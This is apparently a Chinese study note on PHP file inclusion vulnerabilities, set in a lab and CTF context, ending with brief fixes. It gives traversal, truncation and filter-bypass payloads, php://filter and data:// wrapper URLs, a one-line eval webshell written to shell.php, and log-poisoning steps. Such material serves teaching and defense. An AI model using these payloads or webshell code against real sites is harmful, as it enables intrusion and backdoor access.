文件包含的作用就是将这个文件包含进去之后,会调用指定文件的代码。先将文件包含才能执行里面的一些相关代码,比如所想进行文件的链接,数据库的查询,就可以先包含一个数据库的配置文件, 再去链接的话就享有配置文件的一些配置信息,就不需要在进行相关的操作。
它可以把一些功能性代码写到一个文件里面,然后用另外一个文件去包含这个文件,这样子就不再重复书写那个包含文件里面的代码。
举四个脚本语句,asp,php,jsp,aspx等
<!==#include file=”1.asp”--> 就相当于包含了1.asp
<!==#include file=”top.aspx”--> 这个aspx运行,包含了一个top.aspx文件
<c:import url=”http://thief.one/1.jsp”> 包含一个远程地址文件jsp
<% include file=”head.jsp”%> 第二种写法,包含一个本地地址文件 jsp
<jsp:include page=”head.jsp”/> 第三种jsp写法
<?php include(‘test.php’)?> php的写法
包含文件的常见写法
搭建一个靶场演示
声明一个变量filenam=get接收到filename值。然后include包含变量filename,
在网站当前目录是有一个1.txt文件的
现在通过地址去访问一下include.php这个文件,
然而phpinfo并没有在代码中体现,而是写在1.txt里面的,然而直接访问1.txt
就只会显示里面的内容,并不会当作代码去执行。而在包含文件里面不管你是asp还是txt,都会把里面的内容当作php代码去执行。网站是php就以php代码去执行,asp就以asp代码去执行。
条件就是一个可控变量,一个漏洞函数,(include包含函数)
#检测
第一种是白盒,有代码之后我们去代码里面分析(代码审计)
第二种是黑盒,没有漏洞,就利用工具去扫描,去看公开的漏洞有没有,利用这个功能点和参数值去判定,就是看后面的参数值的值街上的是不是一个文件或者类似文件名字的命名,来判定给的参数值是不是一个文件,功能点就是去思考这个网站的功能是干嘛用的通过这个功能去思考会涉及到那些函数,有没有文件包含。
这个是检测的一个大概思路。
#类型
类型分为两种一种是本地包含,就是包含本地的文件。一种是远程包含,就是能包含互联网所能访问的文件,都能包含。
远程包含危害更大,因为可以自己去写一个文件,去做一个网站,让包含漏洞的文件指向它,然而这个东西是可以自定义,所以就可以写后门代码之类的东西。
包含都会涉及到应该叫无限制一个叫有限制,无限制就是这个包含漏洞没有限制就直接用,有限制就可能有一些一些干扰,需要我们用特定的方法去绕过。
#利用
我们在利用漏洞的时候都有各种各样的要求,我们能不能进行读取里面的文件或者执行相关的命令,这时我们可以进行一些伪造协议,这些伪造协议也可以进行上面有限制的绕过,利用伪造协议去绕过一些常见的waf软件也是可以的。利用就属于拓展应用,其他协议的结合。
#说一下本地包含,远程包含
本地包含要跨目录,比如想去包含d盘下面的一个文件
就要往上跨两级,../是上一级的意思,所以我们要写两个,最终网站就是
127.0.0.1/xx.php?filename=../../qingshu.txt
成功包含到了w.txt文件,并且执行了里面的语句
现在来看一下有限制的源码
这个有限制是他指向的文件后缀为.html,再去指向刚刚指向过的1.txt文件
这时候就发现网站不一样了,现在他包含的文件的就相当于包含的1.txt.html,由于当前目录没有这个文件,所以执行失败,因为他在文件后面强制加了一个.html,这种就是常规额的验证方式,可以用以下两种方式去绕过,
%00截断,不过要是php环境,而且php版本<5.3.4,小于5.3.4版本呢
这种不太推荐但是很方便,只需要在后面加上个%00,刚刚作者是版本大于5.3.4访问还是刚刚效果切换到了小于5.3.4的版本就正常访问了。
第二种方法,长度截断
条件:Windows系统的话点号需要长度大于256位,linux系统的话点号长度需要大于4096位,大于这个长度就直接截断了,垃圾数据填充的方法思路差不多。
操作系统是目标服务器操作系统
就这样填充垃圾数据。
#远程包含
其实在任何脚本里面都有这么一个简单的设置,来确定这个漏洞会不会成为远程包含。
第一个是代码里面有限制只能包含本地文件就不会远程包含,如果说代码里面没有,并且开发平台上面设置也没有设置禁止包含远程文件,就可能产生远程包含漏洞。
在php里面就有一个开关,allow_url_include
这个是可以通过查看phpinfo查到的和开关状态
如果这里是开启状态的话就允许远程地址的请求,就支持远程包含文件,这里把源码恢复到没有拦截的时候,然后这里老师自己博客里面有一个有远程代码的文件,
远程包含一下老师的文件的时候,输出来了,还显示出来了phpinfo的效果。
而包含的地址是一个远程地址,把这个远程文件去访问了,并且调用执行了。
如果这个远程文件是一个后门代码,现在把那个文件写为一个远程代码,
然后再去访问一下网站,现在代码已经不显示了,但代码已经执行了
我们现在就可以用菜刀去连接这个后门
直接连接上
然后现在把源代码换回来那个有过滤的,然后在去访问网址就不行了,这个过滤也很简单
末尾加? 加%23 加%20 都可以执行
#各种协议流玩法
比赛题目考到的话基本上都会碰到这个伪造协议
我们伪造的时候要先知道这个脚本代码支不支持这个协议,curl不是
协议是分支持不支持的对好的就是支持的协议,和版本限制,在那个脚本代码下可以伪造那个协议。
这个是php里面的写法,测试的版本,部分功能的改观情况,off/on的就是开不开都可以,
选用那种伪造协议要先确定当前网站的脚本代码是否支持,可能还有些支持下面还需要条件
php伪协议链接:https://www.cnblogs.com/endust/p/11804767.html (很全)
讲几个比较重点的
http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt
通过这个代码就可以读取文件里面的内容(链接里面参考)
base64加密是为了避免有一些文件内容乱码,拿去解密就好了。
换一个执行代码效果,就去链接里面找就好了,那里也有说要换成post提交方式,
写入一句话后门代码
<?php
fputs
(
fopen
(
'shell.php'
,
'w'
),
'<?php @eval($_GET[cmd]); ?>'
); ?>
这个语句就相当与写一个shell.php文件,然后将后门的一句写入到那个文件里面去,写入之后就可以直接连接这个shell.php代码试试,
file协议在上面那个表里面是都支持的,
还要data协议,图片上没有。好像php特,
http:
//127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
里面的内容执行代码可以由你自定义,比如这里我想输出个地东西
这就是我们说的具体协议的玩法,如果是别的脚本代码直接去网上搜脚本代码的为协议就好。
ctf-南邮大,i春秋百度坏真题-白盒
打开题目网址
这种题目都是光秃秃的,源码也就只有几串,我们该如何去判断它是什么漏洞w
我们观察页面显示啥都没有,就去看看网址然后就看到后面跟着?file=show.php,file是文件的意思,后面就等于了一个文件,然后我们去掉?file=show.php,之后在访问网站,又是另一个界面
所以我们直接访问show.php文件试试
也是显示这个结果,这就很明显访问这个文件执行的是结果,而刚刚那个文件加了一个参数值包含了一个文件,然后在执行show.php,所以这是一个文件包含漏洞,然后我们他是读取还是执行,我们该如何去利用他,先确定一下他的操作系统
区分大小写是linux,那就可以确定使用的命令,这个网站是php网站,然后输入php为协议代码,之后post方式提交漏洞语句
这个可能是被检测到了,或者监控了,因为他是个非常敏感的命令执行函数,我们要先测试一下,
还是不行,看下面这个表格
刚刚使用的是这个语句,可能是因为他没有打开需要的配置,我们换一个语句就好了,打开php的为协议链接,复制一个读取文件的代码下来,拿到网站上来直接用。
这时一个base64编码,我们拿去解码一下,
解码测试出来,然后放到一个文档上看看
春秋-CTF训练 演示
打开网站靶场
这个代码的意思如果是request方式接受所有格式提交,有参数值变量path就包含path,如果不是就包含phpinfo.php,这时候我们就使者给path赋值然后就是php为协议命令执行代码,执行ls(语句用大小写测试过什么操作系统),显示出来了
然后很明显我们要读取哪一个文件,直接去读取,网页显示什么都没有就差看一下源代码
结果出来了
某cms程序文件包含利用-黑盒
文件包含分为两种,一种是本地包含,只能包含本地的问,这个需要上传一个文件上去区包含,如果没有,我又不知道他的本地文件叫什么,没办法去包含,如果没有第一种思路就是看能不能上传一个文件上去,其次是看有没有别的方法解决
打开靶场
我们知道他是eku就直接去网上搜eku漏洞
然后打开一个网站
就是在执行这个他的错误日志里面写入一个一句话后么代码,然后去包含错误文件日志地区,
这就是提示了一个错误,但是在他的错误日志里面
就已经上传了这个文件,
然后去访问就执行了这个文件,密码是orange,
不用菜刀链接,这样测试一下没问题就没事。
这里可能会想为什么不能直接用菜刀去链接那个上传的文件,因为上传的文件类型不是php文件,里面有php代码也解析不了,执行不了。
修复
waf安全产品,固定后缀文件,如果不需要传参数值,就直接写死最好,不给变量,